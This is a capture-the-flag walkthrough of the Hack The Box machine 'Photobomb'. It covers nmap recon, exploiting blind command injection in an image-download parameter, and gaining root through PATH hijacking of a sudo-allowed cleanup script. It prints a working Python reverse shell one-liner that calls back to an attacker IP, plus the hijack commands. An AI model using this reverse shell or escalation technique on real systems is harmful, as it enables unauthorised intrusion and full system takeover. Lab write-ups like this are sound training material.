[HTB] : Photobomb Walkthrough

Initial Recon

nmap -A -Pn photobomb.htb -T5 -oN init.txt
Not shown: 991 filtered tcp ports (no-response)
PORT     STATE  SERVICE     VERSION
21/tcp   closed ftp
22/tcp   open   ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA)
|   256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA)
|_  256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519)
25/tcp   closed smtp
80/tcp   open   http        nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Photobomb
110/tcp  closed pop3
111/tcp  closed rpcbind
139/tcp  closed netbios-ssn
995/tcp  closed pop3s
8080/tcp closed http-proxy
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 652.81 seconds

We can see that a web-server is running on port 80. There is a path /printer protected with Basic Auth. If we inspect the source code of the website, we can see credentials disclosed in /photobomb.js file.

The application allows user to download images from the web-server in user requested size. Intercepting the request during image retrieval we can see following request being sent.

I found that, the fileype param is vulnerable to blind command injection. So, we can get a reverse shell through this. But the standard bash reverse shell didn’t worked. I used the following python3 reverse shell .

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.89",1338));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

We can see that user wizard is allowed to run /opt/cleanup.sh

wizard@photobomb:/tmp$ cat /opt/cleanup.sh
cat /opt/cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;

Here, we can see that the script uses find and cat command relatively. So, we can create a custom find command, change path variable and gain root privilege after execution.

echo bash > find && chmod +x find

Now, if we change the path variable and execute script we can be root user.

sudo PATH=$PWD:$PATH /opt/cleanup.sh